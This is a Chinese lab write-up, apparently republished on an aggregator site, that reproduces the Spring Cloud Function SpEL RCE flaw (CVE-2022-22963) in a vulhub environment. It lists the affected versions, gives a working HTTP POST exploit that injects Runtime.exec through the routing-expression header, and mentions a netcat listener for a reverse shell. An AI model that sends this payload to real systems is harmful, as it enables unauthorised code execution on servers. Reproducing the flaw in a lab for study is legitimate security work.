ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE

2022-05-27 16:34:07  阅读:310  来源: 互联网

标签:Function Spring xxx 22963 漏洞 复现 Cloud


0x00 实验环境

攻击机:Ubuntu

靶场:vulhub搭建的靶场环境

 

0x01 影响版本

  • 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6
  • Spring Cloud Function <= 3.2.2

不受影响版本

  • Spring Cloud Function 3.1.7
  • Spring Cloud Function 3.2.3

 

0x02 漏洞复现

(1)访问页面,默认页面是这样:

(2)首先验证漏洞,直接刷新链接,然后抓包,然后发送post包:

POST /functionRouter HTTP/1.1
Host: xxx:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping xxx.xxx.xxx")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 (3)直接反弹shell的命令:nc -lvp 端口

 

 

0x03 漏洞原理

 https://blog.csdn.net/qq_36869808/article/details/124164802

 

0x04 参考文献

https://blog.csdn.net/qq_36869808/article/details/124164802

 

0x05 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

标签:Function,Spring,xxx,22963,漏洞,复现,Cloud
来源: https://www.cnblogs.com/cute-puli/p/16318077.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有